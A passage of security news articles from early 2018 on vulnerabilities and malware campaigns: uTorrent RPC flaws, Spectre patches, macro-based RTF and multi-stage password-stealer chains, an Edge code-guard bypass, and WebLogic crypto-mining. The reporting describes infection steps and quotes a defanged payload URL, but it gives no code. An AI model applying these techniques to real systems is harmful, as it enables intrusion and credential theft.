The flaw, tracked as CVE-2018-0121, allows a remote attacker to bypass authentication and gain administrator privileges on the service portal. The authentication mechanism can be bypassed by submitting an empty value when prompted to enter an admin password.

The vulnerability affects ESC 3.0.0 and it has been addressed with the release of version 3.1.0. This version also patches a high severity unauthorized access vulnerability caused by the presence of default credentials for the service portal.

Cisco also informed customers on Wednesday of a high severity denial-of-service (DoS) vulnerability in the Interactive Voice Response (IVR) management connection interface of the company’s Unified Customer Voice Portal (CVP) product. A remote attacker can exploit this flaw to cause a DoS condition by initiating a specially crafted connection to the IP address of the targeted device.

Cisco says there is no evidence that any of these vulnerabilities have been exploited in malicious attacks.

Cisco on Wednesday also released advisories for cross-site scripting (XSS), cross-site request forgery (CSRF) and DoS flaws affecting its UCS Director and Integrated Management Controller Supervisor, Unified Communications Manager, Prime Service, Prime Collaboration, Jabber Client Framework, Data Center Analytics Framework, and Unity Connection products, but they have all been assigned a “medium” severity rating.


Google white hackers disclosed critical vulnerabilities in uTorrent clients
22.2.20218 securityaffairs
Vulnerebility

White hackers at Google Project Zero have discovered two critical remote code execution vulnerabilities in versions of BitTorrent’s web-based uTorrent Web client and uTorrent Classic desktop client.
With dozens of millions of active users a day, uTorrent is one of the most popular torrent client, the vulnerabilities could be easily exploited by the researchers to deliver a malware on the target computer or view the past downloads.

Project Zero hacker Tavis Ormandy published a detailed analysis of the issues because the vulnerabilities were not fixed in a 90-day period according to the disclosure policy.

utorrent security

The flaws are tied to various JSON-RPC issues, or issues related to the way the web-based apps handle JavaScript Object Notations (JSON) as they relate to the company’s remote procedure call (RPC) servers.

“By default, utorrent create an HTTP RPC server on port 10000 (uTorrent classic) or 19575 (uTorrent web). There are numerous problems with these RPC servers that can be exploited by any website using XMLHTTPRequest(). To be clear, visiting *any* website is enough to compromise these applications.0 reads the technical analysis.”

Both desktop and web-based uTorrent clients use a web interface to display website content, the presence of JSON-RPC issues make possible the attack decribed by Ormandy,

The expert discovered that the issue can allow an attacker to trigger a flaw in the clients by hiding commands inside web pages that interact with uTorrent’s RPC servers.

An attacker can exploit the vulnerability to change the torrent download folder and download a file to any writable location, including the Windows Startup folder and download an executable file, that will be executed on every startup. The attacker could exploit the same flaw to gain access to user’s download activity information.

The researchers explained that a remote exploitation of the flaw requires a DNS rebinding attack that allows a JavaScript code hosted on a website to create a bridge to the local network bypassing the same-origin policy (SOP).

“This requires some simple DNS rebinding to attack remotely, but once you have the (authentication) secret you can just change the directory torrents are saved to, and then download any file anywhere writable,” Ormandy wrote.

“The authentication secret is not the only data accessible within the webroot – settings, crashdumps, logs and other data is also accessible. As this is a complete remote compromise of the default uTorrent web configuration, I didn’t bother looking any further after finding this,” the researcher added.


Tavis Ormandy

@taviso
Hmm, it looks like BitTorrent just added a second token to uTorrent Web. That does not solve the DNS rebinding issue, it just broke my exploit. 😩

10:08 PM - Feb 20, 2018
164
54 people are talking about this
Twitter Ads info and privacy
20 Feb

Tavis Ormandy

@taviso
Hmm, it looks like BitTorrent just added a second token to uTorrent Web. That does not solve the DNS rebinding issue, it just broke my exploit. 😩


Tavis Ormandy

@taviso
I just fixed the exploit and verified it still works. I would recommend asking BitTorrent to resolve this issue if you're affected, and it works in the default configuration so you probably are. Sigh.

10:20 PM - Feb 20, 2018
86
28 people are talking about this
Twitter Ads info and privacy
Ormandy released proof-of-concept (PoC) code for the flaws he discovered.

This week, BitTorrent released an official statement on the matter:

“On December 4, 2017, we were made aware of several vulnerabilities in the uTorrent and BitTorrent Windows desktop clients. We began work immediately to address the issue. Our fix is complete and is available in the most recent beta release (build 3.5.3.44352 released on 16 Feb 2018). This week, we will begin to deliver it to our installed base of users. All users will be updated with the fix automatically over the following days. The nature of the exploit is such that an attacker could craft a URL that would cause actions to trigger in the client without the user’s consent (e.g. adding a torrent).”


Intel releases Spectre patches for Skylake, Kaby Lake, Coffee Lake
22.2.20218 securityaffairs
Vulnerebility

Intel released a stable microcode update to address the Spectre vulnerability for its Skylake, Kaby Lake, and Coffee Lake processors in all their various variants.
Intel has released microcode to address the CVE-2017-5715 Spectre vulnerability for many of its chips, let’s this time the security updates will not cause further problems.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Problems such as frequent reboots were related to the fix for the CVE-2017-5715 Spectre flaw (Spectre Variant 2) and affected almost any platform, including systems running on Broadwell Haswell CPUs, as well as Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

Spectre patches

A couple of weeks ago Intel released new microcode for its Skylake processors, now it has announced security updates for Kaby Lake, Coffee Lake and other CPUs.

The microcode is now available for all 6th, 7th, and 8th generation Core processors and also X-series Intel Core products, as well as Xeon Scalable and Xeon D chips.

Intel released the Spectre firmware security updates for the following products:

Anniedale/Moorefield, Apollo Lake, Avoton/Rangeley, Broxton, Cherry View, Coffee Lake, Cougar Mountain, Denverton, Gemini Lake, Kaby Lake, Knights Landing, Knights Mill, Skylake, SoFIA, Tangier, Valleyview/Bay Trail, and XGold.

Intel released beta patches for Broadwell, Gladden, Haswell, some Ivy Bridge, Sandy Bridge, and Skylake Xeon E3 processors. The beta patches have been provided to OEMs for their final validation.

The patches for the remaining chips are either in pre-beta or planning phase.

Both Intel and AMD confirmed are working on processors that will include protections against attacks such as Spectre and Meltdown.


Google Researcher Finds Critical Flaws in uTorrent Apps
21.2.2018 securityweek
Vulnerebility

Google researcher Tavis Ormandy discovered several critical vulnerabilities in the classic and web-based versions of BitTorrent’s uTorrent application. Patches have been released, but the expert says not all flaws have been fixed properly.

Ormandy found that the uTorrent Classic and the uTorrent Web apps create an HTTP RPC server on ports 10000 and 19575, respectively. These RPC servers and some vulnerabilities allow remote attackers to take control of the apps with little user interaction.

In the case of uTorrent Web, which is accessed by users via their web browser, the application relies on a random token that is included in every request for authentication. The problem, according to Ormandy, is that the token can be easily obtained by an attacker from the web root folder and abused to take control of the service.

A malicious actor can exploit the flaw to change the torrent download folder and download a file to any writable location. For example, a hacker could change the download directory to the Startup folder in Windows and download an executable file, which would run on every startup.

An exploit can be executed remotely using a DNS rebinding attack, which allows JavaScript code hosted on a website to create a bridge to the local network, effectively bypassing the same-origin policy (SOP).

Ormandy noted that the web root folder also contains other data – not just the authentication token – including settings, logs and crash dump files.

In the case of uTorrent Classic, the Google researcher discovered a vulnerability that allows a malicious website to obtain the targeted user’s download history.

The expert also noticed that the application disables the ASLR and GS exploit mitigations, and that the guest account does not disable some features – the app’s documentation says many features are disabled for security reasons.

Finally, Ormandy found a design flaw related to the use of the Mersenne Twister pseudorandom number generator (PRNG) for creating authentication tokens and cookies, session identifiers, and pairing keys.

The vulnerabilities were reported to BitTorrent on November 27 and they were made public on Tuesday. Ormandy released technical details and proof-of-concept (PoC) code for the more serious of the vulnerabilities he discovered.

The latest beta version of uTorrent Classic (3.5.3 build 44352) patches the flaws, but Ormandy noted that it still disables the ASLR mitigation. BitTorrent says the fixes will be delivered automatically to users over the next days.

As for uTorrent Web, BitTorrent has attempted to implement a patch, but the Google Project Zero researcher says he has managed to bypass it.

BitTorrent VP of Engineering Dave Rees told SecurityWeek that the company only learned of the uTorrent Web vulnerability this week. Nevertheless, the company believes that all vulnerabilities discovered by Ormandy it the two products have been addressed.

uTorrent is not the only torrent application found to be vulnerable to DNS rebinding attacks. In January, Ormandy revealed that he had managed to execute arbitrary code via such an attack against the Transmission client.


Malicious RTF Persistently Asks Users to Enable Macros
21.2.2018 securityweek
Virus  Vulnerebility

A malicious RTF (Rich Text Format) document has been persistently displaying an alert to ask users to enable macros, Zscaler security researchers have discovered.

As part of this unique infection chain, the malicious document forces the victims to execute an embedded VBA macro designed to download the QuasarRAT and NetWiredRC payloads.

While analyzing the attack, the security researchers discovered that the actor included macro-enabled Excel sheets inside the malicious RTF documents, to trick users into allowing the execution of payloads.

The RTF document features the .doc extension and is opened with Microsoft Word. When that happens, a macro warning popup is displayed, prompting the user to either enable or disable the macro.

However, the malicious RTF document repeatedly displays the warning popups even if the targeted user clicks on the “Disable Macros” button. By persistently displaying the alert, the malicious actor increases the chances for the user giving in and allowing the macro to run.

The analyzed malicious RTF contains 10 embedded Excel spreadsheets, meaning that the warning is displayed 10 times. Users can’t stop these popups unless they click through all of them or force-quit Word, Zscaler notes.

The attack relies on the use of “\objupdate” control for the embedded Excel sheet objects (OLE object). This function would trigger the macro code inside the embedded Excel sheet when the RTF document is being loaded in Microsoft Word, thus causing the multiple macro warning popups to appear.

The same “\objupdate” control was observed being abused in attacks leveraging the CVE-2017-0199 vulnerability that Microsoft patched in April last year. The new attack, however, does not exploit this vulnerability or another Office security flaw.

The actor behind this campaign used two variations of the malicious macro. The code executes a PowerShell command to download intermediate payloads using Schtasks and cmd.exe. By performing registry modifications, the malware would also permanently enable macros for Word, PowerPoint, and Excel.

The macro downloads a malicious VBS file which terminates all running Word and Excel instances, downloads a final payload using the HTTPS protocol and executes the payload.

Next, it enables macros for Office and disables protected view settings in the suite, creates a scheduled task to run the downloaded payload after 200 minutes, deletes the scheduled task, and downloads an additional payload to the same location.

Zscaler observed the attack dropping two Remote Access Trojans (RATs), namely NetwiredRC and QuasarRAT. NetwiredRC can find files, launch remote shell, log keystrokes, capture screen, steal passwords, and more. QuasarRAT is free and open source, and is believed to be an evolution of xRAT. It has features such as remote webcam, remote shell, and keylogging.


Intel Releases Spectre Patches for More CPUs
21.2.2018 securityweek
Vulnerebility

Intel has released firmware updates that fix the Spectre vulnerability for many of its processors and patches for dozens more are nearly ready for use in production environments.

After the first round of microcode updates released by the company caused problems for many users, including more frequent reboots and unstable systems, Intel started working on a new set of patches that should address these issues.

The company first released new firmware updates for its Skylake processors, but on Tuesday it announced that patches are now also available for Kaby Lake, Coffee Lake and other CPUs. This includes 6th, 7th, and 8th generation, and X-series Intel Core products, as well as Xeon Scalable and Xeon D processors used in data center systems.Intel releases microcode updates to patch Spectre

As of February 21, the following products have Spectre firmware patches ready for use in production environments: Anniedale/Moorefield, Apollo Lake, Avoton/Rangeley, Broxton, Cherry View, Coffee Lake, Cougar Mountain, Denverton, Gemini Lake, Kaby Lake, Knights Landing, Knights Mill, Skylake, SoFIA, Tangier, Valleyview/Bay Trail, and XGold.

Beta patches, which have been provided to OEMs under NDA for validation, are currently available for Broadwell, Gladden, Haswell, some Ivy Bridge, Sandy Bridge, and Skylake Xeon E3 processors.

As for the remaining CPUs, patches are either in pre-beta or planning phase, but pre-mitigation microcode updates, which should be replaced once production fixes are released, are available for many products.

The patches are generally available through OEM firmware updates. Device manufacturers started releasing BIOS updates to patch the Meltdown and Spectre vulnerabilities shortly after their disclosure, but many decided to halt the updates after Intel warned of instability issues. Some vendors have resumed the distribution of firmware updates.

Meltdown attacks are possible due to a vulnerability tracked as CVE-2017-5754, while Spectre attacks are possible due to flaws tracked as CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be patched with software updates, but Spectre Variant 2 requires microcode updates for a complete fix.

Both Intel and AMD announced recently that they are working on processors that will have built-in protections against Spectre- and Meltdown-like exploits.

In the meantime, Intel faces more than 30 lawsuits, including ones filed by customers and shareholders, over the Meltdown and Spectre vulnerabilities.


A new multi-stage attack deploys a password stealer without using macros
20.2.2018 securityaffairs
Vulnerebility  Attack

Security researchers at Trustwave spotted a new malicious campaign that uses a multi-stage attack to deploy a password stealer.
Researchers at Trustwave have spotted a new malware-based campaign that uses a multi-stage infection to deploy a password stealer malware.

Hackers leverage the infamous Necurs botnet to distribute spam emails delivering Microsoft Office documents that embedded malicious macros.

DOCX attachments used by the attackers contain an embedded OLE object that has external references, the external access is provided to remote OLE objects to be referenced in the document.xml.rels.

“Anyone can easily manipulate data in a Word 2007 file programmatically or manually. As shown below, the DOCX attachment contains an embedded OLE object that has external references. This ‘feature’ allows external access to remote OLE objects to be referenced in the document.xml.rels.” states the analysis published by trustwave.

“When user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually a RTF file that is downloaded and executed.”

Once the victim opened the file, it will attempt to trigger the CVE-2017-11882 memory-corruption flaw that was used by many threat actors in the wild, including the Cobalt hacking group. Microsoft fixed the vulnerability in November, the CVE-2017-11882 flaw was discovered by the security researchers at Embedi, it affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

The component fails to properly handle objects in the memory, a bug that could be exploited by the attacker to execute malicious code in the context of the logged-in user.

Back to the macro-based Multi-Stage attack discovered by Trustwave, the RTF file accessed after the victim opens the DOCX files executes an MSHTA command line to download and execute a remote HTA file.

The HTA file contains VBScript with obfuscated code that decodes to a PowerShell Script designed to eventually downloads and executes a remote binary file that is a Password Stealer Malware.

“The malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist.” continues the analysis.

multi-stage attack

The password stealer will send data to the command and control server (C&C) via an HTTP POST.

The most interesting aspect of this attack is the use of multiple stages to deliver the final payload, an approach that Trustwave calls unusual.

Malware researchers at Trustwave highlighted that a so long infection chain is more likely to fail compared to other technique implemented in other attacks.

“It’s pretty unusual to find so many stages and vectors being used to download malware. Indeed, this approach can be very risky for the malware author. If any one stage fails, it will have a domino effect on the whole process. Another noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF.” concludes Trustwave.

The analysis published by Trustwave includes the Indicators of Compromise (IoCs).


RubyGems 2.7.6 addresses several flaws and implements some improvements
20.2.2018 securityaffairs
Vulnerebility

The RubyGems 2.7.6 update released last week for RubyGems includes several security improvements and addresses several types of vulnerabilities.
The new RubyGems 2.7.6 release addresses several vulnerabilities in Ruby Gems and implements several security improvements.

The updates prevent path traversal when writing to a symlinked basedir outside of the root and during gem installation.

RubyGems 2.7.6

The updates also address a cross-site scripting (XSS) vulnerability in the homepage attribute when displayed via gem server and an Unsafe Object Deserialization issue in gem owner.

The new RubyGems release raises a security error when there are duplicate files in a package and enforce URL validation on spec homepage attribute.

To update to the latest RubyGems you can run:

gem update --system


Several Vulnerabilities Patched in RubyGems
20.2.2018 securityweek
Vulnerebility

An update released last week for RubyGems includes several security improvements and patches for various types of vulnerabilities.

RubyGems 2.7.6 patches path traversal vulnerabilities that exist when writing to a symlinked basedir outside of the root and during gem installation. It also fixes a cross-site scripting (XSS) vulnerability in the homepage attribute when displayed via gem server, and a possible unsafe object deserialization flaw.

This was not the only deserialization issue patched recently in RubyGems. Back in October, developers informed users that an unsafe deserialization vulnerability could have been exploited for remote code execution.

The latest version of RubyGems also includes some security improvements, such as triggering a security error when a package contains duplicate files, enforcing URL validation on the spec homepage attribute, and strictly interpreting octal fields in tar headers.

Yasin Soliman, nmalkin and plover have each been credited for two of the vulnerabilities patched in RubyGems 2.7.6.

A total of five security holes were patched in RubyGems last year. The deserialization issue, tracked as CVE-2017-0903, and an ANSI escape sequence vulnerability identified as CVE-2017-0899 were the only ones rated “high severity” based on their CVSS score.

Other vulnerabilities fixed last year included a DNS request hijacking issue, a denial-of-service (DoS) flaw, and a weakness that could have been exploited by malicious gems to overwrite arbitrary files.

Five vulnerabilities were also patched last year in Ruby itself, including command injection and memory corruption issues.


Macro-Based Multi-Stage Attack Delivers Password Stealer
20.2.2018 securityweek
Vulnerebility  Attack

A malicious attack uses a multi-stage infection to deploy malware that is capable of stealing passwords from various applications on a victim’s computer, Trustwave reports.

The attack starts with spam emails distributed from the Necurs botnet to deliver macro-enabled documents, such as Word docs, Excel spreadsheets, or PowerPoint presentations, to the targets.

As part of this infection campaign, DOCX attachments containing an embedded OLE object that has external references was used. Thus, external access is provided to remote OLE objects to be referenced in the document.xml.rels, Trustwave explains.

As soon as the user opens the file, a remote document is accessed from the URL hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. Although it has a .doc extension, the file is actually a RTF document.

Once executed on the victim’s system, the file attempts to exploit the CVE-2017-11882 vulnerability that Microsoft patched last November in the Office’s Equation Editor tool, and which has been already abused in a wide range of attacks.

The RTF file executes an MSHTA command line to download and execute a remote HTA file. In turn, the HTA file contains VBScript with obfuscated code which decodes to a PowerShell Script designed to fetch and run a remote binary file.

This binary is the final payload that turns out to be a password stealer malware family capable of gathering credentials from email, FTP, and browsers installed on the victim’s machine. For that, it concatenates available strings in the memory and uses the RegOpenKeyExW and PathFileExistsW APIs to check if registry or paths of various programs exist.

The malware was observed sending the harvested data to its command and control (C&C) server via a HTTP POST request.

The most interesting aspect of this attack is the use of multiple stages to deliver the final payload, an approach that Trustwave calls unusual. The security researchers also point out that this long infection chain is more likely to fail compared to other, more straightforward attacks.

“Indeed, this approach can be very risky for the malware author. If any one stage fails, it will have a domino effect on the whole process. Another noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF,” Trustwave concludes.


Record-Breaking Number of Vulnerabilities Disclosed in 2017: Report
19.2.2018 securityweek
Vulnerebility
Vulnerability QuickView 2017 Vulnerability Trends

A record-breaking number of vulnerabilities were disclosed in 2017, with a total of 20,832 such security flaws, a new report from Risk Based Security shows.

According to the company’s VulnDB QuickView report, last year saw a 31.0% year-on-year increase in the number of vulnerabilities disclosed. The number of flaws recorded by the National Vulnerability Database (NVD) increased as well.

Of all the issues published by Risk Based Security in 2017, 7,900 weren’t documented by MITRE’s Common Vulnerability Enumeration (CVE) and NVD, and 44.5% of these issues had a CVSSv2 score between 7.0 and 10. This, the security firm notes, represents a major risk for organizations worldwide, as they might not even be aware of the fact that those vulnerabilities exist.

In 2017, 39.3% of all published vulnerabilities have CVSSv2 scores above 7.0, 48.5% of them can be exploited remotely, and public exploits exist for 31.5% of the vulnerabilities, the security firm’s report (PDF) reveals. Half (50.6%) of the 2017 vulnerabilities are web-related and 28.9% of these web-related issues are Cross-Site Scripting (XSS) bugs.

The list of top ten vendors with vulnerabilities featuring CVSS scores between 9.0 and 10.0 includes Google (503 flaws), SUSE (301), Canonical (285), Red Hat (274), SGP – a subsidiary of Silent Circle (257), Adobe (256), Mozilla (246), Samsung (228), Oracle (201), and Xerox (198).

The top ten products with vulnerabilities featuring CSSv2 Scores 9.0 - 10.0 include Google Pixel/Nexus devices (354 issues), Ubuntu (285), SilentOS (257), Red Had Enterprise Linux (253), Firefox (246), SUSE Linux Enterprise Desktop (226), Samsung Mobile Devices (226), SUSE Linux Enterprise Server (197), OpenSUSE Leap (196), and FreeFlow Print Server (191).

Last year, at least 44.8% (9,335) of vulnerabilities disclosed were coordinated with the vendor and only 18.6% (3,875) of them were uncoordinated disclosures. Only 5.9% of 2017 vulnerabilities were disclosed as part of vendor or third-party bug bounty programs, the report reveals.

While most of the vulnerabilities disclosed last year (72.8%) have updates or some form of a patch available for them, 23.2% of the issues currently have no known solution. However, 443 of the vulnerabilities reported in 2017 were found to have no risk due to inaccurate disclosures, meaning that no mitigation was necessary for them.

The report also reveals that only 1.7% of all reported vulnerabilities in 2017 were found in SCADA products, down from 2.8% in 2016. 52.2% of the SCADA vulnerabilities were remotely exploitable, 73.5% had an impact on the integrity of the product, and 61.3% were related to improper input validation.

“Organizations that track and triage vulnerability patching saw no relief in 2017, as it was yet another record-breaking year for vulnerability disclosures. The increasingly difficult task of protecting digital assets has never been so critical to businesses as we continue to see a rise in compromised organizations and data breaches. If your vulnerability intelligence solution didn’t offer information on the more than 20,000 vulnerabilities disclosed in 2017, your organization is at an increased risk”, said Brian Martin, VP of Vulnerability Intelligence for Risk Based Security.


Over 30 Lawsuits Filed Against Intel for CPU Flaws
19.2.2018 securityweek
Vulnerebility

More than 30 lawsuits have been filed by Intel customers and shareholders against the chip giant following the disclosure of the Meltdown and Spectre attack methods.

Three class action lawsuits were filed against Intel within a week of the Meltdown and Spectre flaws being disclosed, but the number had reached 32 by February 15, according to an annual report submitted by Intel to the U.S. Securities and Exchange Commission (SEC).

Lawsuits have been filed in the United States and other countries, and some complaints also target Intel’s directors and executives.

The company faces 30 class action lawsuits filed by customers who claim to have been harmed by Intel’s actions and/or omissions in connection to Meltdown and Spectre. Two securities class action lawsuits claim the company violated securities laws by making false or misleading statements, which had a negative impact on entities that acquired Intel stock between July 27, 2017 and January 4, 2018, when the processor vulnerabilities were disclosed.

“We dispute the claims described above and intend to defend the lawsuits vigorously,” Intel said. “Given the procedural posture and the nature of these cases, including that the proceedings are in the early stages, that alleged damages have not been specified, that uncertainty exists as to the likelihood of a class or classes being certified or the ultimate size of any class or classes if certified, and that there are significant factual and legal issues to be resolved, we are unable to make a reasonable estimate of the potential loss or range of losses, if any, that might arise from these matters.”

Three shareholder derivative lawsuits have also been filed in California against certain Intel officers and members of the company’s board of directors.

“The complaints allege that the defendants breached their duties to Intel in connection with the disclosure of the security vulnerabilities and the failure to take action in relation to alleged insider trading. The complaints seek to recover damages from the defendants on behalf of Intel,” Intel said.

While lawsuits and negative publicity may change the situation in the future, Intel currently does not expect Meltdown and Spectre to have a material financial impact on its business or operations.

AMD, ARM and Apple, whose processors rely on ARM technology, also face lawsuits over the Meltdown and Spectre vulnerabilities.


90 days have passed, Google discloses unpatched flaw in the Microsoft Edge browser
19.2.2018 securityaffairs
Vulnerebility

Google Project Zero disclosed details of an unpatched flaw in the Edge browser because Microsoft failed to address it within a 90-day deadline.
White hackers at the Google Project Zero have disclosed details of an unpatched vulnerability in the Edge browser because Microsoft failed to address it within a 90-day deadline according to the Google’s disclosure policy.

The flaw could be exploited by attackers to bypass the Arbitrary Code Guard (ACG) that was implemented in Windows 10 Creators Update alongside Code Integrity Guard (CIG).

The security features allow preventing Edge browser exploits from loading and executing malicious code.

“An application can directly load malicious native code into memory by either 1) loading a malicious DLL/EXE from disk or 2) dynamically generating/modifying code in memory. CIG prevents the first method by enabling DLL code signing requirements for Microsoft Edge. This ensures that only properly signed DLLs are allowed to load by a process. ACG then complements this by ensuring that signed code pages are immutable and that new unsigned code pages cannot be created.” states the description published by Microsoft.

Microsoft Edge browser flaw

Google Project Zero researcher Ivan Fratric who discovered the vulnerability demonstrated that the ACG feature can be bypassed. The expert reported the issue to Microsoft on November 17, but the tech giant had initially planned to include a fix in the February Patch Tuesday updates, but evidently, something went wrong because “the fix is more complex than initially anticipated.”

The vulnerability was classified as having “medium” severity, Project Zero has published details of the issue in a blog post.

“If a content process is compromised and the content process can predict on which address JIT process is going to call VirtualAllocEx() next (note: it is fairly predictable), content process can: 1. Unmap the shared memory mapped above above using UnmapViewOfFile() 2. Allocate a writable memory region on the same address JIT server is going to write and write an soon-to-be-executable payload there. 3. When JIT process calls VirtualAllocEx(), even though the memory is already allocated, the call is going to succeed and the memory protection is going to be set to PAGE_EXECUTE_READ.” reads the analysis shared by Google.

In February 2017, Fratric published technical details related to a high severity type confusion vulnerability, tracked as CVE-2017-0037, that could have been exploited by attackers to crash Internet Explorer and Edge browser, and under certain circumstance to execute arbitrary code.


Google Discloses Unpatched Edge Vulnerability
19.2.2018 securityweek
Vulnerebility

Google Project Zero has made public the details of an unpatched vulnerability affecting the Edge web browser after Microsoft failed to release a patch within a 90-day deadline.

Google Project Zero researcher Ivan Fratric has found a way to bypass Arbitrary Code Guard (ACG), a feature added by Microsoft to Edge in Windows 10 Creators Update alongside Code Integrity Guard (CIG).

The features, introduced in February 2017, are designed to prevent browser exploits from executing malicious code.

“An application can directly load malicious native code into memory by either 1) loading a malicious DLL/EXE from disk or 2) dynamically generating/modifying code in memory,” Microsoft explained. “CIG prevents the first method by enabling DLL code signing requirements for Microsoft Edge. This ensures that only properly signed DLLs are allowed to load by a process. ACG then complements this by ensuring that signed code pages are immutable and that new unsigned code pages cannot be created.”

Fratric showed that the ACG feature can be bypassed and informed Microsoft of his findings on or around November 17. The company had initially planned on patching the vulnerability with its February Patch Tuesday updates, but later determined that “the fix is more complex than initially anticipated.”

Microsoft now expects to release a fix on March 13, but the date exceeds Google Project Zero’s 90-day disclosure deadline so the details of the vulnerability have been made public. Project Zero has classified the flaw as having “medium” severity.

This is not the first time Project Zero has disclosed an unpatched vulnerability found by Fratric in Microsoft’s web browsers. In February 2017, it made public details and proof-of-concept (PoC) code for a high severity type confusion issue that could have been exploited to crash Internet Explorer and Edge, and possibly even execute arbitrary code.

The security hole, tracked as CVE-2017-0037, was fixed by Microsoft in March 2017, roughly two weeks after it was disclosed.

Fratric is the creator of a fuzzer named Domato, which last year helped him uncover tens of vulnerabilities in popular web browser engines.


Oracle WebLogic Server Flaw Exploited to Deliver Crypto-Miners
16.2.2018 securityweek
Vulnerebility  Exploit  CoinMine

Threat actors are exploiting a recently patched vulnerability in Oracle WebLogic Server to infect systems with crypto-currency mining malware, FireEye reports.

Identified as CVE-2017-10271, the vulnerability resides in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and older, and was addressed by Oracle it its October 2017 Critical Patch Update (CPU).

After proof-of-concept code exploiting the bug was made public in December, activity associated with the exploitation of this vulnerability increased in volume, FireEye's researchers say. Successful exploitation of the flaw on unpatched systems allows attackers to remotely execute arbitrary code.

“We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity,” FireEye reported.

The crypto-currency market boomed recently, and cybercriminals have not been shy in their attempts to take advantage of the market. However, actors involved in crypto-currency mining operations don’t normally target specific organizations, but rather launch attacks that are opportunistic in nature.

Attackers abusing CVE-2017-10271 to infect targeted systems with crypto-miners used various tactics to achieve their purpose, the researchers discovered. Some of the incidents, for example, used PowerShell to drop the miner directly onto the victim’s system and leveraged ShellExecute() for execution.

In other attacks, PowerShell scripts were used to deliver the miner, instead of downloading the executable directly. In addition to downloading the miner, the script would also attempt to achieve persistence through scheduled tasks.

The script would delete the tasks created by other crypto-miners and would kill processes associated with those programs, in addition to being able to connect to mining pools with wallet key. It would also limit CPU usage to avoid suspicion.

Tactics employed in other attacks also involved the use of tools such as Mimikatz and EternalBlue for lateral movement across Windows environments.

The malware would first determine whether the system is 32-bit or 64-bit, to fetch a specific PowerShell script from the command and control (C&C) server. Next, it checks all network adapters and attempts to connect to every system in the network using extracted credentials, to run a PowerShell to drop and run the malware on the targeted system.

The malware uses WMI (Windows Management Instrumentation) for persistence and can perform a Pass-the-Hash attack using NTLM information derived from Mimikatz, to download and execute the malware on remote machines. It sends the stolen credentials to a remote server using an HTTP GET request.

If it fails moving laterally, the malware uses the PingCastle MS17-010 scanner to determine whether the target is vulnerable to EternalBlue.

In scenarios targeting Linux machines, the vulnerability would be exploited to deliver shell scripts that include functionality similar to that of PowerShell scripts. They would attempt to kill already running crypto-miners and then download and execute the malware, in addition to creating a cron job to maintain persistence.

“Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks,” FireEye says.

Although they might be seen as less risky when compared to ransomware operations, crypto-currency mining malware does pose a variety of risks. Systems infected with crypto-miners might experience slowed performance, but such operations could also be hiding additional malware.


BGP Flaws Patched in Quagga Routing Software
16.2.2018 securityweek
Vulnerebility

Several vulnerabilities that could lead to denial-of-service (DoS), information disclosure, and remote code execution have been patched this week in the Quagga routing software suite.

Quagga implements the Open Shortest Path First (OSPF), Routing Information Protocol (RIP), Border Gateway Protocol (BGP) and Intermediate System to Intermediate System (IS-IS) protocols for Unix-like platforms, particularly Linux, Solaris, FreeBSD and NetBSD.

Quagga developers and the CERT Coordination Center (CERT/CC) at Carnegie Mellon University announced this week that Quagga 1.2.3 patches several vulnerabilities affecting the BGP daemon (bpgd).

One of the more serious flaws, rated critical by CERT/CC based on its CVSS score, is CVE-2018-5379, a double-free memory corruption issue related to the processing of certain UPDATE messages containing cluster-list or unknown attributes.

“This issue can be triggered by an optional/transitive UPDATE attribute, that all conforming eBGP speakers should pass along. This means this may triggerable in many affected Quagga bgpd processes across a wide area of a network, because of just one UPDATE message,” Quagga developers explained. “This issue could result in a crash of bgpd, or even allow a remote attacker to gain control of an affected bgpd process.”

Another vulnerability, CVE-2018-5381, can be exploited to cause bgpd to enter an infinite loop and stop responding until it’s restarted. “BGP sessions will drop and not be reestablished,” developers said.

Quagga 1.2.3 also patches CVE-2018-5378, a security hole that can lead to sensitive data from the bgpd process being sent over the network to a configured peer. This can also cause the bgpd process to crash.

The last vulnerability patched by the latest Quagga release is CVE-2018-5378, which developers say has “very low” impact.

Linux distributions, including Ubuntu, Debian and Red Hat, have started publishing advisories describing these vulnerabilities. Regarding CVE-2018-5379, Red Hat said “Glibc's heap protection mitigations render this issue more difficult to exploit, though bypasses may still be possible.”


DELL EMC addressed two critical flaws in VMAX enterprise storage systems
16.2.2018 securityaffairs
Vulnerebility

Dell EMC addressed two critical vulnerabilities that affect the management interfaces for its VMAX enterprise storage systems.
The Dell EMC’s VMAX Virtual Appliance (vApp) Manager is an essential component of a wide range of the enterprise storage systems.

The first flaw tracked as CVE-2018-1215 is an arbitrary file upload vulnerability that could be exploited by a remote authenticated attacker to potentially upload arbitrary maliciously crafted files in any location on the web server. The flaw received a Common Vulnerability Scoring System (CVSS) base score of 8.8.

“Arbitrary file upload vulnerability A remote authenticated malicious user may potentially upload arbitrary maliciously crafted files in any location on the web server. By chaining this vulnerability with CVE-2018-1216, the attacker may use the default account to exploit this vulnerability.” reads the security advisory.

VMAX enterprise storage systems

The second flaw tracked as CVE-2018-1216 is an undocumented default account in the vApp Manager with a hard-coded password. The flaw received a Common Vulnerability Scoring System (CVSS) base score of 9.8.

